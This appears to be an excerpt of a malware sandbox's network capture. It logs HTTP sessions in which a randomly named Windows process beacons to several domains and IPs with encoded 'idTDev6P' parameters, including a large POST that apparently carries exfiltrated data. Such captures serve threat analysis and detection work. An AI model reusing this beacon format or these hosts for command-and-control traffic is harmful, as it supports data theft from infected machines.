idTDev6P=/ShqnqpQTwoV/hIIwmFg2zdT8bjG9oSu9iu87n4VjWwY96yIxIRzTOmufiQcY6rrrKHRqvrQrXqXzyjQIh8zQKsMkzKimPsWqxm+UJugBmM/FbS/yDNd/kcaY19W21BlkVJzON1Gae4L5tFAFKApBPvvLccneZxcSpKTh8yPMFM0HGrmLRfziB0Rh8uzfA2a5y/+PIA3garKayxHlARnFqq3ukwaTxxk5WAwb+4h6ygFUQ34GwoD+d0XoVlBjKHguU/t8BWWdGA3uwsB62FCRwndK0q01z5T9VGYbJ/FzUNoruLHw8tJZPhExeXB/f7ozn5S+gFzjZbBTnhehqQiz7Js3u/s3NnzWlDZueINLgiI1IKnTdD2y/1ZssOyichAOFb2IWJ59YciYvGuSRcHN3xK1fHwM17oKJeeZAv2hcpuGt4oFMKpHsBbgVygwq3snaq8OYFgV7ifx4IwkJ1rkxmpVMU3xJ5/t5D5v+ju7kIapcLBskSLbu3PD4MvIxNl4T9g5Yc+/q8J4NByFT8sB3QO4+rPbFpSac3E8732KsBtTXvUzJZrEIEz5xe0E8Vrs3P17ZoowQIh/u46Rgjn9DWi2RydlU6IrazPs1x5WGKQIB1Mk37XdjiIr8z9ZtOjmJAlkoJUl82188o3zaHr0bD73dKC8Cmwz6/6QFOMnjAQbnoOFqhxyNBj+RBcCrYo6+o6fI1JedFrQ7km0SoIOoKxJ9V6TvwqrhHZ1xfwogqNK0i+Z09paYCPG70vedA974guGfg0zb7GqszbqRfrZhEzWwDYJJTwr1/9Ask8dp2Hk9zwlQ4JKYHzYQIJEXf+OK81n0IaB5ohdAl+9wsjhSuhDcNakRezc/TfAltCwsLO5YJu2/aK0ANWh/mNOIywIHRGB5B91E+P8YxYqoy62vNTaWKtNcBq40Hv+qY5xaroYF9gmt+gjXXtuhRiWrAa+j7TQIUnQtKxfwqVEAlWuNcJ39T/WqpnXeg1LvkyLk8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50032	85.159.66.93	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:24.495415926 CET	476	OUT	GET /l5cx/?idTDev6P=yQJKkfxWdg40vhwN6z0cv3Re74y0hoes8gKbzV8myB83hLOXrLVtbOGyahZiWqLsl6rE8IHzhGOG+V3nBGIGQZ1Tpj+VkeU09FX8TcyzM38BEJG/9zYR/HY=&z2=LHT8eHbp3J HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.tabyscooterrentals.xyz Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 13, 2025 10:21:25.172451973 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Mon, 13 Jan 2025 09:21:25 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2025-01-13T09:21:30.0626729Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50033	199.59.243.228	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:30.471219063 CET	723	OUT	POST /gott/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sql.dance Origin: http://www.sql.dance Referer: http://www.sql.dance/gott/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 33 6d 42 70 35 2f 52 35 31 32 32 73 6b 78 74 30 67 77 50 47 35 50 33 51 35 63 58 49 68 62 71 2b 64 4f 72 76 43 41 66 50 2f 42 57 5a 4f 42 37 46 4f 62 6e 45 76 78 48 44 68 64 73 62 48 4d 62 36 41 54 63 4e 47 58 4a 45 6a 44 55 54 51 55 45 62 6e 65 76 31 71 4a 4c 62 45 64 6a 30 43 76 4d 62 58 31 5a 4b 2f 71 61 52 61 35 62 41 6a 63 6d 78 76 79 66 33 67 61 4d 4e 34 4f 58 43 67 6e 6f 6e 4e 6d 46 67 6c 6d 75 58 61 6a 52 6d 4e 47 70 6e 77 52 63 68 53 77 44 5a 77 66 4d 73 7a 72 42 62 56 31 49 63 6f 7a 63 72 77 6f 53 39 74 72 4a 51 4a 4e 32 78 46 63 6b 32 41 4a 5a 2b 61 37 51 30 64 77 3d 3d Data Ascii: idTDev6P=3mBp5/R5122skxt0gwPG5P3Q5cXIhbq+dOrvCAfP/BWZOB7FObnEvxHDhdsbHMb6ATcNGXJEjDUTQUEbnev1qJLbEdj0CvMbX1ZK/qaRa5bAjcmxvyf3gaMN4OXCgnonNmFglmuXajRmNGpnwRchSwDZwfMszrBbV1IcozcrwoS9trJQJN2xFck2AJZ+a7Q0dw==
Jan 13, 2025 10:21:30.891829967 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 13 Jan 2025 09:21:29 GMT content-type: text/html; charset=utf-8 content-length: 1102 x-request-id: 96ffb95d-45f0-406a-b87b-0a89fe9afb07 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg== set-cookie: parking_session=96ffb95d-45f0-406a-b87b-0a89fe9afb07; expires=Mon, 13 Jan 2025 09:36:30 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 36 72 45 69 33 63 58 6c 45 30 41 37 67 6f 58 6f 49 33 46 6a 44 70 65 32 49 72 30 74 47 71 36 69 62 4d 6a 75 56 56 4c 67 4d 79 4a 35 36 33 74 6c 7a 48 49 39 7a 56 79 33 44 42 2f 78 38 4c 6d 6f 6f 33 6a 43 6d 35 62 4e 74 6c 75 68 46 68 33 53 64 6c 48 70 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 13, 2025 10:21:30.891875029 CET	555	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTZmZmI5NWQtNDVmMC00MDZhLWI4N2ItMGE4OWZlOWFmYjA3IiwicGFnZV90aW1lIjoxNzM2NzYwMD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50034	199.59.243.228	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:33.012820005 CET	743	OUT	POST /gott/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sql.dance Origin: http://www.sql.dance Referer: http://www.sql.dance/gott/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 33 6d 42 70 35 2f 52 35 31 32 32 73 6b 52 64 30 6e 6a 33 47 70 66 33 58 33 38 58 49 34 4c 72 33 64 4f 76 76 43 45 48 6d 2b 31 36 5a 4f 6a 6a 46 50 5a 50 45 75 78 48 44 71 39 74 66 4b 73 62 78 41 54 52 77 47 57 31 45 6a 44 6f 54 51 56 30 62 6e 4e 33 71 72 5a 4c 5a 49 39 6a 79 50 50 4d 62 58 31 5a 4b 2f 75 79 33 61 35 44 41 6a 74 57 78 39 67 6e 77 74 36 4d 4f 2f 4f 58 43 71 48 6f 6a 4e 6d 46 43 6c 6b 61 78 61 68 5a 6d 4e 47 35 6e 7a 46 77 69 5a 77 44 58 30 66 4e 34 69 61 67 33 4d 31 74 42 74 42 55 50 78 4c 76 63 68 4e 45 4b 59 38 58 6d 58 63 41 46 64 4f 51 4b 58 34 74 39 47 77 47 32 33 72 51 73 79 6e 4e 59 47 37 4b 30 2b 65 64 7a 43 33 77 3d Data Ascii: idTDev6P=3mBp5/R5122skRd0nj3Gpf3X38XI4Lr3dOvvCEHm+16ZOjjFPZPEuxHDq9tfKsbxATRwGW1EjDoTQV0bnN3qrZLZI9jyPPMbX1ZK/uy3a5DAjtWx9gnwt6MO/OXCqHojNmFClkaxahZmNG5nzFwiZwDX0fN4iag3M1tBtBUPxLvchNEKY8XmXcAFdOQKX4t9GwG23rQsynNYG7K0+edzC3w=
Jan 13, 2025 10:21:33.452137947 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 13 Jan 2025 09:21:33 GMT content-type: text/html; charset=utf-8 content-length: 1102 x-request-id: 1c8f4d91-65ea-4774-a865-544015b3231c cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg== set-cookie: parking_session=1c8f4d91-65ea-4774-a865-544015b3231c; expires=Mon, 13 Jan 2025 09:36:33 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 36 72 45 69 33 63 58 6c 45 30 41 37 67 6f 58 6f 49 33 46 6a 44 70 65 32 49 72 30 74 47 71 36 69 62 4d 6a 75 56 56 4c 67 4d 79 4a 35 36 33 74 6c 7a 48 49 39 7a 56 79 33 44 42 2f 78 38 4c 6d 6f 6f 33 6a 43 6d 35 62 4e 74 6c 75 68 46 68 33 53 64 6c 48 70 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 13, 2025 10:21:33.452184916 CET	555	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWM4ZjRkOTEtNjVlYS00Nzc0LWE4NjUtNTQ0MDE1YjMyMzFjIiwicGFnZV90aW1lIjoxNzM2NzYwMD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50035	199.59.243.228	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:35.691648006 CET	10825	OUT	POST /gott/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sql.dance Origin: http://www.sql.dance Referer: http://www.sql.dance/gott/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 33 6d 42 70 35 2f 52 35 31 32 32 73 6b 52 64 30 6e 6a 33 47 70 66 33 58 33 38 58 49 34 4c 72 33 64 4f 76 76 43 45 48 6d 2b 30 75 5a 4f 77 72 46 4f 2b 54 45 74 78 48 44 6a 64 74 63 4b 73 62 57 41 54 35 30 47 57 35 55 6a 46 6b 54 51 7a 67 62 7a 6f 62 71 67 5a 4c 5a 56 74 6a 7a 43 76 4d 30 58 31 4a 77 2f 71 57 33 61 35 44 41 6a 76 4f 78 74 43 66 77 76 36 4d 4e 34 4f 58 4f 67 6e 70 38 4e 6d 4e 34 6c 6b 65 48 61 52 35 6d 4d 6e 4a 6e 2f 57 49 69 61 51 43 78 7a 66 4e 77 69 61 73 6f 4d 31 78 4e 74 41 67 78 78 4d 48 63 68 4c 31 69 45 2b 4c 42 4c 4f 51 71 46 63 77 51 5a 36 31 57 47 78 58 4b 2f 4b 63 34 79 6a 35 47 41 72 50 38 73 2f 52 32 54 44 42 6f 4c 79 6e 6f 4b 67 68 6c 30 57 63 33 35 6e 4b 30 62 73 39 64 32 6b 4f 56 79 66 51 63 31 41 38 45 56 5a 71 38 75 57 42 70 51 31 79 64 68 44 39 56 2f 50 78 6d 42 54 69 54 57 4f 43 68 39 63 52 59 50 7a 6e 63 5a 2b 43 32 58 4b 53 31 2b 47 74 37 75 6e 37 69 69 6a 32 62 63 56 72 69 37 77 64 6e 66 49 49 38 71 64 76 6b 6f 4a 31 31 76 36 43 46 56 [TRUNCATED] Data Ascii: idTDev6P=3mBp5/R5122skRd0nj3Gpf3X38XI4Lr3dOvvCEHm+0uZOwrFO+TEtxHDjdtcKsbWAT50GW5UjFkTQzgbzobqgZLZVtjzCvM0X1Jw/qW3a5DAjvOxtCfwv6MN4OXOgnp8NmN4lkeHaR5mMnJn/WIiaQCxzfNwiasoM1xNtAgxxMHchL1iE+LBLOQqFcwQZ61WGxXK/Kc4yj5GArP8s/R2TDBoLynoKghl0Wc35nK0bs9d2kOVyfQc1A8EVZq8uWBpQ1ydhD9V/PxmBTiTWOCh9cRYPzncZ+C2XKS1+Gt7un7iij2bcVri7wdnfII8qdvkoJ11v6CFVbVlchXeC5pbDoUTuMgjBP7DLTU7FN+enqAqN3HSSRo0srhAojlRN7KWuhzthemMVgfsJA0y3re8W8VJExLROBYnzHYW2HipWp3g/dS+oBqiBGHK9FQokBrGq14PFEJkZ/p8ppTb1NPMfDmAc6vfvsVciYXMRG6cYukBOcZGfPMukfRw1HzWKPVsHZNbzz08APkPv0U7k35oYJrRZbyxSXi4WjalTLjQPKf5L2jb0x/WWJnai9egtbZiGNZvRDXG1UCR+/MlQR1yF3x597O02wbCERbWcuSAs6r1wtv+V1y9kj66L9SxQkm1B/30OM217oZNaSuOM2TSLwuoavgd/YpP/c242Q42MrZiHXhWWtwJS1ZBBDD7X00r3B9rl+vstQ8lDXiueJ9gqg1sPExGdqUuM6z2zNM9ULfi1j8TM/GChp5VlDiQJN/s5fIkif+aiubZy57DygcL7KxWqdTZqEoORoyLGwKkW11XtettO37y03yymsXHtUf7lNuJzfuBGqlpap8oA2fMSwelY79B7QEon32TDk0wMg5G+Q+dPqhdJdK7uWF21pFI+Z3nYJoHDTPYDbjJFD6sASI5Dmks+LnB/zr28BYBtClu92AhyPIjNjWXnIWYYTS2Cu5fVnAauPRQsc/2YRMmPeZz0muvEAnyyFGph6JMGt+ [TRUNCATED]
Jan 13, 2025 10:21:36.131838083 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 13 Jan 2025 09:21:35 GMT content-type: text/html; charset=utf-8 content-length: 1102 x-request-id: cd494186-940f-4e93-a9eb-73d5199c583b cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg== set-cookie: parking_session=cd494186-940f-4e93-a9eb-73d5199c583b; expires=Mon, 13 Jan 2025 09:36:36 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 36 72 45 69 33 63 58 6c 45 30 41 37 67 6f 58 6f 49 33 46 6a 44 70 65 32 49 72 30 74 47 71 36 69 62 4d 6a 75 56 56 4c 67 4d 79 4a 35 36 33 74 6c 7a 48 49 39 7a 56 79 33 44 42 2f 78 38 4c 6d 6f 6f 33 6a 43 6d 35 62 4e 74 6c 75 68 46 68 33 53 64 6c 48 70 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 13, 2025 10:21:36.131860018 CET	555	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2Q0OTQxODYtOTQwZi00ZTkzLWE5ZWItNzNkNTE5OWM1ODNiIiwicGFnZV90aW1lIjoxNzM2NzYwMD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50036	199.59.243.228	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:38.250113010 CET	463	OUT	GET /gott/?z2=LHT8eHbp3J&idTDev6P=6kpJ6LpNwGTQjQFo3QTaoLrj/KP09pa+dbP4DmTHwDi6SRHyD6uQyy/krsAgEdDgCRluenpg23EjeT8+1f7IhrL8LPD7Y+8AZWFZ/qadVKHEgd+qnz3Eias= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.sql.dance Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 13, 2025 10:21:38.712024927 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 13 Jan 2025 09:21:38 GMT content-type: text/html; charset=utf-8 content-length: 1458 x-request-id: 0f96613e-d6df-456d-9cb3-7e66cb075adb cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QbuOysDjo+vRemzpFz3BuwKTMqE6ihnIq/9EA4yMDV+y2blbgmMtxak3EjvnlKI9fzkWiaLhQCd6dbLzgA15rA== set-cookie: parking_session=0f96613e-d6df-456d-9cb3-7e66cb075adb; expires=Mon, 13 Jan 2025 09:36:38 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 62 75 4f 79 73 44 6a 6f 2b 76 52 65 6d 7a 70 46 7a 33 42 75 77 4b 54 4d 71 45 36 69 68 6e 49 71 2f 39 45 41 34 79 4d 44 56 2b 79 32 62 6c 62 67 6d 4d 74 78 61 6b 33 45 6a 76 6e 6c 4b 49 39 66 7a 6b 57 69 61 4c 68 51 43 64 36 64 62 4c 7a 67 41 31 35 72 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QbuOysDjo+vRemzpFz3BuwKTMqE6ihnIq/9EA4yMDV+y2blbgmMtxak3EjvnlKI9fzkWiaLhQCd6dbLzgA15rA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 13, 2025 10:21:38.712049961 CET	911	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGY5NjYxM2UtZDZkZi00NTZkLTljYjMtN2U2NmNiMDc1YWRiIiwicGFnZV90aW1lIjoxNzM2NzYwMD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50037	38.22.89.164	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
